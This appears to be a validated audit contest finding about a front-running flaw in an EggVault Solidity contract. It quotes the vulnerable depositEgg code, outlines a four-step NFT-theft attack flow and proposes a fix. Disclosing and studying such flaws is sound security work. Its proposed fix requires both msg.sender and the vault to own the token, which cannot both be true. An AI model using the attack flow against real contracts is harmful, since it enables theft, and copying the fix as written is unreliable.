Eggstravaganza
First Flight #37
Beginner FriendlySolidity
100 EXP
View results
Previous Next
Submission Details
Severity: high
Valid

Arbitrary Depositor Assignment Allows NFT Theft in EggVault

albert

Summary

The depositEgg function in EggVault.sol contains a critical vulnerability that allows any caller to arbitrarily set the depositor address for deposited NFTs. Combined with missing access controls, this enables attackers to steal deposited NFTs by front-running legitimate deposit transactions.

Vulnerability Details

The vulnerable code exists in the depositEgg function:

function depositEgg(uint256 tokenId, address depositor) public {
require(eggNFT.ownerOf(tokenId) == address(this), "...");
require(!storedEggs[tokenId], "...");
storedEggs[tokenId] = true;
eggDepositors[tokenId] = depositor; // 🚨 Vulnerable line
}

Attack flow:

  1. User A transfers their NFT to the vault

  2. Attacker front-runs the deposit transaction by calling depositEgg(tokenId, attackerAddress)

  3. Attacker becomes the recorded depositor

  4. Attacker calls withdrawEgg to steal the NFT

Impact

• Permanent loss of user NFTs (direct financial impact)
• Complete compromise of vault security model
• Loss of protocol credibility

Tools Used

• Manual code review
• Foundry test simulation

Recommendations

Critical Fix:

function depositEgg(uint256 tokenId) public { // Remove depositor param
require(msg.sender == eggNFT.ownerOf(tokenId), "Not NFT owner");
require(address(eggNFT) != address(0), "NFT contract not set");
require(eggNFT.ownerOf(tokenId) == address(this), "...");
storedEggs[tokenId] = true;
eggDepositors[tokenId] = msg.sender; // Use transaction sender
}
Updates

Lead Judging Commences

m3dython Lead Judge 5 months ago
Submission Judgement Published
Validated
Assigned finding tags:

Frontrunning Vulnerability DepositEgg

Front-running depositEgg allows deposit ownership hijacking.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.